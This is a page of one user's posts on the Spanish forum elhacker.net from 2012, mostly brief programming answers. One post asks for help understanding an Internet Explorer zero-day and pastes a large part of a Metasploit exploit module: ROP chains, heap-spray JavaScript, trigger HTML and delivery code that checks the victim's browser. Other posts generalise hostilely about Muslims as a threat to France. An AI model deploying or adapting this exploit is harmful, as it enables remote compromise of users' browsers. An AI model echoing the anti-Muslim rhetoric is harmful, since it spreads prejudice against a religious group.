elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17
71  Programación / Desarrollo Web / Re: Quiero un dominio SÍ o SÍ en: 20 Septiembre 2012, 13:44 pm
Muy bien explicado.
+1
72  Programación / Desarrollo Web / Re: popup!, mostrar datos, guardados en la base de datos! en: 20 Septiembre 2012, 13:41 pm
Otra opcion es.

Anadir AJAX con ASP.

Saludos
73  Programación / Programación General / Re: Que hicieron para volverse programadores C++? en: 20 Septiembre 2012, 08:29 am
Hola, hasta la 4 vineta esta bastatne bien explicado lo que tienes que aprender.

Bueno y eso de 2 semanas,para aprender otro lenguaje, discrepo.

Despues de conocer bien un lenguaje de programacion es facil aprender otro , te miras las diferencias y listo.Pero para saber otro lenguaje hay que: Practicar y crear muchos progrmas con ese nuevo lenguaje.Y hacer los programs en relativamente poco tiempo.

Saludos
74  Programación / Programación General / Re: ayuda programación en: 19 Septiembre 2012, 16:44 pm
Hola  Belisner.



Los dos son muy parecidos.
Tanto C#.NET como vb.net usan el framework   .NET.
EL framework es la libreria que se encnarga de  crear conexiones entre el software de desarollo y la aplicacion final.Usando el lenguaje CLI .
(Comon language interface).

CLI es el lenguaje que usa .net en todos los lenguajes de progrmacion de la plataforma .NET


Porque te cuento todo esto porque SI hay un lenguaje comun para toda la plataforma net que significa?

Pues que podemos traducir facilmente codigos fuentes estandar para usarlos en otro lenguaje.

Te aconsejo c# .




75  Foros Generales / Foro Libre / Re: La pelicula de * que dio la vuelta al mundo. en: 19 Septiembre 2012, 14:13 pm
Estoy deacuerdo, si seguimos dandole importancia a estas tonterias dentro de poco formaremos parte de ellos.
Porque?
Porque nuestro sistema protege excesivamente a las minorias.

Por lo que si un musulman se caga en Dios, no pasa nada porque el es una minoria en el Pais.
Ahora si yo me cago en mahoma , van a saltar todas las asociaciones islamicas del mundo.
Lo peor es que muchas de esas asociaciones estan en los paises ricos donde , al minorista se le protege enseguida.Porque?


Somos Idiotas , ellos lo saben y seguiran aprochandose del sistema.

Tu comentario un poco bestia si , efectivo si!Correcto No

Si seguimos asi y no es broma dentro de poco,
los musulmanes en francia podrian votar por poner el velo a las mujeres.(Ejemplo un poco basto)
Ya tenemos musulmanes en el senado en Francia.
si hay (50%de musulmanes en senado significa control islamico sobre el gobierno.)

Todavia no estamos en ese punto pero me asusta solo de pensarlo.



Quien da mas miedo China o los islamistas?
Que sera lo siguiente??
Que pasa si la comunidad islamica sigue creciendo?

Bueno saludos a todos.
76  Programación / Programación C/C++ / Exlpoit Zero Day. en: 19 Septiembre 2012, 13:39 pm
Hola a todos .
Como ya sabran muchos hya un exploit por hay suelto que microsoft teme.

Me puse a investigar un poco.
Encontre el exploit y me puse a leerlo.

Necesito ayuda para entender el codigo.

http://dev.metasploit.com/redmine/projects/framework/repository/revisions/cc8102434af31669cdd54fe10e438181498983e5/entry/modules/exploits/windows/browser/ie_execcommand_uaf.rb

Algun programador que pueda resumirme rapidamente las partes para que sirven?
Resumirme en 3 bloques O 4 MAS O MENOS PARA SABER LO QUE HACE.

No entinedo a partir de aqui.
Código:
 def get_payload(t, cli)

                code = payload.encoded

                # No rop. Just return the payload.

                return code if t['Rop'].nil?

                # Both ROP chains generated by mona.py - See corelan.be

                case t['Rop']

                when :msvcrt

                        print_status("Using msvcrt ROP")

                        exec_size = code.length

                        stack_pivot = [

                                0x77c4e393, # RETN

                                0x77c4e392, # POP EAX # RETN

                                0x77c15ed5, # XCHG EAX, ESP # RETN

                        ].pack("V*")

                        rop =

                        [

                                0x77C21891,  # POP ESI # RETN

                                0x0c0c0c04,  # ESI

                                0x77c4e392,  # POP EAX # RETN

                                0x77c11120,  # <- *&VirtualProtect()

                                0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN

                                junk,

                                0x77c2dd6c,  # XCHG EAX,ESI # ADD [EAX], AL # RETN

                                0x77c4ec00,  # POP EBP # RETN

                                0x77c35459,  # ptr to 'push esp #  ret'

                                0x77c47705,  # POP EBX # RETN

                                exec_size,   # EBX

                                0x77c3ea01,  # POP ECX # RETN

                                0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)

                                0x77c46100,  # POP EDI # RETN

                                0x77c46101,  # ROP NOP (-> edi)

                                0x77c4d680,  # POP EDX # RETN

                                0x00000040,  # newProtect (0x40) (-> edx)

                                0x77c4e392,  # POP EAX # RETN

                                nop,         # NOPS (-> eax)

                                0x77c12df9,  # PUSHAD # RETN

                        ].pack("V*")

                when :jre

                        print_status("Using JRE ROP")

                        exec_size = 0xffffffff - code.length + 1

                        if t['Random']

                                stack_pivot = [

                                        0x0c0c0c0c, # 0c0c0c08

                                        0x7c347f98, # RETN

                                        0x7c347f97, # POP EDX # RETN

                                        0x7c348b05  # XCHG EAX, ESP # RET

                                ].pack("V*")

                        else

                                stack_pivot = [

                                        0x7c347f98, # RETN

                                        0x7c347f97, # POP EDX # RETN

                                        0x7c348b05  # XCHG EAX, ESP # RET

                                ].pack("V*")

                        end

                        rop =

                        [

                                0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN

                                exec_size,   # Value to negate, will become 0x00000201 (dwSize)

                                0x7c347f98,  # RETN (ROP NOP)

                                0x7c3415a2,  # JMP [EAX]

                                0xffffffff,

                                0x7c376402,  # skip 4 bytes

                                0x7c351e05,  # NEG EAX # RETN

                                0x7c345255,  # INC EBX # FPATAN # RETN

                                0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN

                                0x7c344f87,  # POP EDX # RETN

                                0xffffffc0,  # Value to negate, will become 0x00000040

                                0x7c351eb1,  # NEG EDX # RETN

                                0x7c34d201,  # POP ECX # RETN

                                0x7c38b001,  # &Writable location

                                0x7c347f97,  # POP EAX # RETN

                                0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]

                                0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN

                                0x7c345c30,  # ptr to 'push esp #  ret '

                        ].pack("V*")

                end

                code = stack_pivot + rop + code

                return code

        end

        # Spray published by corelanc0d3r

        # Exploit writing tutorial part 11 : Heap Spraying Demystified

        # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

        def get_random_spray(t, js_code, js_nops)

                spray = <<-JS


                function randomblock(blocksize)

                {

                        var theblock = "";

                        for (var i = 0; i < blocksize; i++)

                        {

                                theblock += Math.floor(Math.random()*90)+10;

                        }

                        return theblock;

                }


                function tounescape(block)

                {

                        var blocklen = block.length;

                        var unescapestr = "";

                        for (var i = 0; i < blocklen-1; i=i+4)

                        {

                                unescapestr += "%u" + block.substring(i,i+4);

                        }

                        return unescapestr;

                }


                var heap_obj = new heapLib.ie(0x10000);


                var code = unescape("#{js_code}");

                var nops = unescape("#{js_nops}");


                while (nops.length < 0x80000) nops += nops;


                var offset_length = #{t['Offset']};


                for (var i=0; i < 0x1000; i++) {

                        var padding = unescape(tounescape(randomblock(0x1000)));

                        while (padding.length < 0x1000) padding+= padding;

                        var junk_offset = padding.substring(0, offset_length);

                        var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);

                        while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;

                        sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);

                        heap_obj.alloc(sprayblock);

                }


                JS

                return spray

        end

        def get_spray(t, js_code, js_nops)

                js = <<-JS

                var heap_obj = new heapLib.ie(0x20000);

                var code = unescape("#{js_code}");

                var nops = unescape("#{js_nops}");


                while (nops.length < 0x80000) nops += nops;

                var offset = nops.substring(0, #{t['Offset']});

                var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);


                while (shellcode.length < 0x40000) shellcode += shellcode;

                var block = shellcode.substring(0, (0x80000-6)/2);


                heap_obj.gc();


                for (var i=1; i < 0x300; i++) {

                        heap_obj.alloc(block);

                }


                var overflow = nops.substring(0, 10);

                JS

        end

        def load_html1(cli, my_target)

                p = get_payload(my_target, cli)

                js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))

                js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

                js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

                if my_target['Random']

                        js = get_random_spray(my_target, js_code, js_r_nops)

                else

                        js = get_spray(my_target, js_code, js_nops)

                end

                js = heaplib(js, {:noobfu => true})

                html = <<-EOS

                <html>

                        <body>

                                <script>

                                        var arrr = new Array();

                                        arrr[0] = window.document.createElement("img");

                                        arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";

                                </script>


                                <iframe src="#{this_resource}/#{@html2_name}"></iframe>

                                <script>

                                        #{js}

                        </script>

                        </body>

                </html>

                EOS

                return html

        end

        def load_html2

                html = %Q|

                <HTML>

                        <script>

                                function funcB() {

                                        document.execCommand("selectAll");

                                };


                                function funcA() {

                                        document.write("#{Rex::Text.rand_text_alpha(1)}");

                                        parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";

                                }


                        </script>

                        <body onload='funcB();' onselect='funcA()'>

                                <div contenteditable='true'>

                                        a

                                </div>

                        </body>

                </HTML>

                |

                return html

        end

        def this_resource

                r = get_resource

                return ( r == '/') ? '' : r

        end

        def on_request_uri(cli, request)

                print_status request.headers['User-Agent']

                agent = request.headers['User-Agent']

                my_target = get_target(agent)

                # Avoid the attack if the victim doesn't have the same setup we're targeting

                if my_target.nil?

                        print_error("Browser not supported, sending a 404: #{agent.to_s}")

                        send_not_found(cli)

                        return

                end

                vprint_status("Requesting: #{request.uri}")

                if request.uri =~ /#{@html2_name}/

                        print_status("Loading #{@html2_name}")

                        html = load_html2

                elsif request.uri =~ /#{@html1_name}/

                        print_status("Loading #{@html1_name}")

                        html = load_html1(cli, my_target)

                elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/

                        print_status("Redirecting to #{@html1_name}")

                        send_redirect(cli, "#{this_resource}/#{@html1_name}")

                        return

                else

                        send_not_found(cli)

                        return

                end

                html = html.gsub(/^\t\t/, '')

                send_response(cli, html, {'Content-Type'=>'text/html'})

        end

        def exploit

                @html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"

                @html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"

                super

        end

end

Igual he pedido demasiado pero cualquier ayuda es bien recibida   :P
Saludos
77  Foros Generales / Foro Libre / Re: La pelicula de * que dio la vuelta al mundo. en: 19 Septiembre 2012, 11:23 am
Umm.No estoy del todo deacuerdo.Que odian a estados unidos?
Quien no odia a estados unidos?

Soy frances y si tu supieras la de musulmanes que hay en francia,pues estan los medios que hechan humo.

Pues a todos los musulmanes que piensan que la fuerza es la solucion.
Que os den por el OJAL.
Estoy harto de la escoria humana que busca cualquier escusa para ,hacer uso de la fuerza.
Ojala alguno me lea.

Saludos para los que no se quejan y estan ahi aguantando. ;)
78  Foros Generales / Foro Libre / La pelicula de * que dio la vuelta al mundo. en: 19 Septiembre 2012, 10:31 am
Alguien me podria explicar porque una pelicula , que hace referencia a un dios  ridiculizandolo,como puede probocar esta oleada de ataques mediaticos revindicando blasfemias contra su religion; cuando todos los dias veo peliculas que se mofan de Jesus y de cualquier cosa.
Quien dice nada?
Estoy en mi derecho de ridiculizar a un dios en una pelicula si asi me lo parece ;
porque la ley de expresion me lo permite.
Os acordais de la vida de Bryan?
Bueno y que ? cuantos murieron por hacer esa pelicula?

Que demonios pasa para que le den tanta importancia los musulmanes, de que tienen miedo?
Que va a cambiar?
Mira que soy creyente pero me La SUDA que ridiculizen a dios.Si no te gusta no lo veas.
Como el porno.Si t egusta lo ves si no no!
79  Programación / .NET (C#, VB.NET, ASP) / Re: [VB.NET] Creación de bucles y comando if en: 19 Septiembre 2012, 09:45 am
Respondiendo a:Puntoinfinito.
Código:
timer1.interval = 10000

¿Quien dijo la limitación de tiempo?


YO dije! limitas por defecto la consulta a 1 milisegundo .Repito : "Consulta"

En tu caso 10000 son 10 segundos.

Si eso es lo que quieres,pues bien.
Pero normalmente cuando alguien hace un programa,  hay que tener en cuenta , la velocidad de tus consultas.

No te aconsejo utilizar Timers, a menos que sea estrictamente necesario.

Saludos
80  Programación / Ingeniería Inversa / Re: Cracking kit tool 2012 en: 19 Septiembre 2012, 09:36 am



Me gusta mucho lo de las apis y las dependencias;Parece muy util.
Ya los probare en una MV.
Buen apotte slaudos
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines